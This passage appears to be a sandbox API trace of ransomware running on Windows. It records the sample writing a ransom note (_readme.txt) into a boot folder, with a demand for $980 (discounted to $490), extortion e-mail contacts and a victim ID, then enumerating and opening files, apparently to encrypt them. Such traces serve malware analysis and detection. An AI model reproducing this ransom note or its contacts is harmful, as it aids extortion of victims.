hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.939] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.939] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.939] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.939] PathFindFileNameW (pszPath="") returned="" [0165.939] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.939] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.942] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.942] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.942] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.942] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0165.942] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.942] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0165.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.943] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.943] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.943] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.943] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.943] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.943] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.943] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0165.943] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0165.943] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.944] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.944] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.944] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.944] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.944] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.944] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.945] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 